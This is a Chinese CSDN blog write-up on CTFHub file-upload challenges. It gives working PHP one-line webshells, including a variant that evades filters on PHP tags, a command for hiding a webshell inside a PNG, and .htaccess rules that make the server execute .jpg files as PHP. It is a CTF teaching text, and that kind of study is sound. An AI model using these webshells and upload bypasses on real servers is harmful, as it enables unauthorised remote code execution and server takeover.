ctfhub 文件上传

本文详细介绍了CTF中常见的文件上传漏洞利用技术,包括一句话木马、.htaccess文件利用、MIME类型绕过、00截断和双写绕过等方法。通过实例演示了如何在各种验证机制下成功上传恶意文件,并利用蚁剑等工具获取服务器权限。
摘要由CSDN通过智能技术生成

目录

基础知识

一句话木马

绕过过滤php头的木马

图片马的制作

.htaccess

无验证:

前端验证:

.htaccess

方法一:

方法二:

MIME绕过

00截断

限制条件

绕过姿势

双写绕过

文件头检查


基础知识

一句话木马

<?php
@eval($_POST['hack'])
?>

绕过过滤php头的木马

<script language="php">@eval($_POST['pass'])</script>

图片马的制作

首先准备一个比较小的png文件(可以用画图画一个),然后有个php小马

命令如下:

copy 1.png/a+1.php/b 2.png

.htaccess

[htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能]()

简单来说,就是我们上传一个.htaccess文件到服务器,然后服务器之后会将特定格式的文件以php格式解析。

版本一:
<FilesMath  ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>
​
版本二:
AddType application/x-httpd-php .jpg

无验证:

我们直接上传一个一句话木马即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值